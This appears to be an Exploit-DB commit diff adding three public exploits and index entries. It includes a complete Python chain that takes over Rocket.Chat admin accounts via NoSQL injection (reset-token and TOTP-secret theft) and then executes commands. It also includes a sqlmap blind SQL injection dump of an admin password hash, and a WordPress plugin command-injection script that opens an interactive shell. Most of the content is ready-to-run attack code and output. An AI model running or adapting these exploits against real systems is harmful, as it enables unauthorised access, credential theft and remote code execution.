DB: 2021-07-08

4 changes to exploits/shellcodes Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2) Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
2021-07-08 05:01:54 +00:00 · 2021-07-08 05:01:54 +00:00 · c19f7edfef
commit c19f7edfef
parent 1514ca02a7
5 changed files with 323 additions and 0 deletions
--- a/exploits/linux/webapps/50108.py
+++ b/exploits/linux/webapps/50108.py
@ -0,0 +1,196 @@
+# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)
+# Author: enox
+# Date: 06-06-2021
+# Product: Rocket.Chat
+# Vendor: https://rocket.chat/
+# Vulnerable Version(s): Rocket.Chat 3.12.1 (2)
+# CVE: CVE-2021-22911
+# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat
+# Info : This is a faster exploit that utilizes the authenticated nosql injection to retrieve the reset token for administrator instead of performing blind nosql injection.
+
+#!/usr/bin/python
+
+import requests
+import string
+import time
+import hashlib
+import json
+import oathtool
+import argparse
+
+parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE')
+parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True)
+parser.add_argument('-a', help='Administrator email', required=True)
+parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True)
+args = parser.parse_args()
+
+
+adminmail = args.a
+lowprivmail = args.u
+target = args.t
+
+
+def forgotpassword(email,url):
+	payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}'
+	headers={'content-type': 'application/json'}
+	r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False)
+	print("[+] Password Reset Email Sent")
+
+
+def resettoken(url):
+	u = url+"/api/v1/method.callAnon/getPasswordPolicy"
+	headers={'content-type': 'application/json'}
+	token = ""
+
+	num = list(range(0,10))
+	string_ints = [str(int) for int in num]
+	characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints
+
+	while len(token)!= 43:
+		for c in characters:
+			payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c)
+			r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
+			time.sleep(0.5)
+			if 'Meteor.Error' not in r.text:
+				token += c
+				print(f"Got: {token}")
+
+	print(f"[+] Got token : {token}")
+	return token
+
+
+def changingpassword(url,token):
+	payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}'
+	headers={'content-type': 'application/json'}
+	r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
+	if "error" in r.text:
+		exit("[-] Wrong token")
+	print("[+] Password was changed !")
+
+
+def twofactor(url,email):
+	# Authenticating
+	sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
+	payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'
+	headers={'content-type': 'application/json'}
+	r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
+	if "error" in r.text:
+		exit("[-] Couldn't authenticate")
+	data = json.loads(r.text)  
+	data =(data['message'])
+	userid = data[32:49]
+	token = data[60:103]
+	print(f"[+] Succesfully authenticated as {email}")
+
+	# Getting 2fa code
+	cookies = {'rc_uid': userid,'rc_token': token}
+	headers={'X-User-Id': userid,'X-Auth-Token': token}
+	payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}'
+	r = requests.get(url+payload,cookies=cookies,headers=headers)
+	code = r.text[46:98]
+	print(f"Got the code for 2fa: {code}")
+	return code
+
+def admin_token(url,email):
+	# Authenticating
+	sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
+	payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'
+	headers={'content-type': 'application/json'}
+	r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
+	if "error" in r.text:
+		exit("[-] Couldn't authenticate")
+	data = json.loads(r.text)  
+	data =(data['message'])
+	userid = data[32:49]
+	token = data[60:103]
+	print(f"[+] Succesfully authenticated as {email}")
+
+	# Getting reset token for admin
+	cookies = {'rc_uid': userid,'rc_token': token}
+	headers={'X-User-Id': userid,'X-Auth-Token': token}
+	payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"}'
+	r = requests.get(url+payload,cookies=cookies,headers=headers)
+	code = r.text[46:89]
+	print(f"Got the reset token: {code}")
+	return code
+
+
+def changingadminpassword(url,token,code):
+	payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}'
+	headers={'content-type': 'application/json'}
+	r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
+	if "403" in r.text:
+		exit("[-] Wrong token")
+
+	print("[+] Admin password changed !")
+
+
+def rce(url,code,cmd):
+	# Authenticating
+	sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
+	headers={'content-type': 'application/json'}
+	payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}'
+	r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
+	if "error" in r.text:
+		exit("[-] Couldn't authenticate")
+	data = json.loads(r.text)
+	data =(data['message'])
+	userid = data[32:49]
+	token = data[60:103]
+	print("[+] Succesfully authenticated as administrator")
+
+	# Creating Integration
+	payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}'
+	cookies = {'rc_uid': userid,'rc_token': token}
+	headers = {'X-User-Id': userid,'X-Auth-Token': token}
+	r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload)
+	data = r.text
+	data = data.split(',')
+	token = data[12]
+	token = token[9:57]
+	_id = data[18]
+	_id = _id[7:24]
+
+	# Triggering RCE
+	u = url + '/hooks/' + _id + '/' +token
+	r = requests.get(u)
+	print(r.text)
+
+############################################################
+
+
+# Getting Low Priv user
+print(f"[+] Resetting {lowprivmail} password")
+## Sending Reset Mail
+forgotpassword(lowprivmail,target)
+
+## Getting reset token through blind nosql injection
+token = resettoken(target)
+
+## Changing Password
+changingpassword(target,token)
+
+
+# Privilege Escalation to admin
+## Getting secret for 2fa
+secret = twofactor(target,lowprivmail)
+
+
+## Sending Reset mail
+print(f"[+] Resetting {adminmail} password")
+forgotpassword(adminmail,target)
+
+## Getting admin reset token through nosql injection authenticated
+token = admin_token(target,lowprivmail)
+
+
+## Resetting Password
+code = oathtool.generate_otp(secret)
+changingadminpassword(target,token,code)
+
+## Authenticating and triggering rce
+
+while True:
+	cmd = input("CMD:> ")
+	code = oathtool.generate_otp(secret)
+	rce(target,code,cmd)
--- a/exploits/php/webapps/50109.txt
+++ b/exploits/php/webapps/50109.txt
@ -0,0 +1,52 @@
+# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection
+# Date: 2021-07-07
+# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip
+# Version: 1.0
+# Tested on: Windows 10, XAMPP
+
+
+################
+# Description  #
+################
+
+The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection.
+Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator.
+
+
+###########
+# PoC     #
+###########
+
+Run sqlmap to dump username and password:
+
+$ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump
+
+
+###########
+# Output  #
+###########
+
+Parameter: username (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+web server operating system: Windows
+web application technology: PHP 5.6.24, Apache 2.4.23
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+current database: 'scheduler'
+
+Database: scheduler
+Table: users
+[1 entry]
+----------+----------------------------------+
+| username | password                         |
+----------+----------------------------------+
+| admin    | 0192023a7bbd73250516f069df18b500 |
+----------+----------------------------------+
+
+
+The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123
--- a/exploits/php/webapps/50110.py
+++ b/exploits/php/webapps/50110.py
@ -0,0 +1,71 @@
+# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
+# Date: 07.07.2021
+# Exploit Author: Beren Kuday GORUN
+# Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
+# Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
+# Version: 20161228 and possibly prior
+# Fixed version: 20180826
+# CVE : CVE-2018-15877
+
+"""
+-------------------------
+Usage:
+┌──(root@kali)-[~/tools]
+└─# python3 WordPress-Activity-Monitor-RCE.py
+What's your target IP?
+192.168.101.28
+What's your username?
+mark
+What's your password?
+password123
+[*] Please wait...
+[*] Perfect! 
+www-data@192.168.101.28  whoami
+www-data
+www-data@192.168.101.28  pwd
+/var/www/html/wp-admin
+www-data@192.168.101.28  id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+"""
+
+import requests
+from bs4 import BeautifulSoup
+
+def exploit(whoami, ip):
+	while 1:
+		cmd = input(whoami+"@"+ip+"  ")
+		url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
+		payload = "google.com.tr | " + cmd
+		data = {'ip': payload , 'lookup' : 'lookup' }
+		x = requests.post(url, data = data, cookies=getCookie(ip))
+		html_doc = x.text.split("<p>Output from dig: </p>")[1]
+		soup = BeautifulSoup(html_doc, 'html.parser')
+		print(soup.p.text)
+
+def poc(ip):
+	url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'
+	myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }
+	x = requests.post(url, data = myobj, cookies=getCookie(ip))
+	html_doc = x.text.split("<p>Output from dig: </p>")[1]
+	soup = BeautifulSoup(html_doc, 'html.parser')
+	print("[*] Perfect! ")
+	exploit(soup.p.text, ip)
+
+def getCookie(ip):
+	url = 'http://' + ip + '/wp-login.php'
+	#log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
+	data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}
+	x = requests.post(url, data = data)
+	cookies = {}
+	cookie = str(x.headers["Set-Cookie"])
+
+	for i in cookie.split():
+		if(i.find("wordpress") != -1 and i.find("=") != -1):
+			cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]
+	return cookies
+
+ip = input("What's your target IP?\n")
+username = input("What's your username?\n")
+password = input("What's your password?\n")
+print("[*] Please wait...")
+poc(ip)
--- a/exploits/windows/local/49858.txt
+++ b/exploits/windows/local/49858.txt
@ -5,6 +5,7 @@
 # Software Link: https://www.splinterware.com/download/ssproeval.exe
 # Version: 5.30 Professional
 # Tested on: Windows 10 Pro 20H2 x64
+# CVE: CVE-2021-31771 

 System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting
 where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44204,6 +44204,7 @@ id,file,description,date,author,type,platform,port
 50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,
 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",2021-06-24,Pergyz,webapps,cfm,
 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",2021-06-24,"Koh You Liang",webapps,hardware,
+50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",2021-07-07,enox,webapps,linux,
 50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",2021-07-06,TheSmuggler,webapps,php,
 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
@ -44245,3 +44246,5 @@ id,file,description,date,author,type,platform,port
 50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",2021-07-06,"Andrea D\'Ubaldo",webapps,hardware,
 50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",2021-07-06,faisalfs10x,webapps,php,
 50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution",2021-07-06,faisalfs10x,webapps,php,
+50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",2021-07-07,faisalfs10x,webapps,php,
+50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",2021-07-07,"Beren Kuday GÖRÜN",webapps,php,